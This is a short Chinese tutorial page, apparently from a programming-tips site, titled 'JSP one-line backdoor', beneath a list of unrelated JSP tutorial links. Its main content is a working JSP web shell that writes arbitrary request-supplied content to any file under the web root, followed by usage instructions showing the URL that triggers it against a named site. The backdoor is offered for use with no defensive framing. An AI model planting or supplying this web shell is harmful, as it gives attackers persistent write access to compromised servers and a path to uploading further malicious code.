当前位置: 首页 > 图文教程 > 网络编程 > JSP > JSP一句话后门

JSP
如何处理网站的头尾和导航的公用文件
JSP输出HTML时产生的大量空格和换行的去除方法
JSP 中文字符处理代码
java对XML文件的解析、节点的增加、删除操作总结
传智播客java web 过滤器
搭建EXTJS和STRUTS2框架(ext和struts2简单实例)
JSP 获取真实IP地址的代码
jsp下页面跳转的几种方法小结
asp.net getRemoteAddr()与 getRemoteHost()的区别

JSP一句话后门


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-13   浏览: 32 ::
收藏到网摘: n/a

<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>

使用方法:
提交url!
jsp?f=1.txt" target="_blank">http://www.whitehouse.net.cn/1.jsp?f=1.txt&t=HelloWorld
然后:http://www.whitehouse.net.cn/1.txt 就出来了 内容为 HelloWorld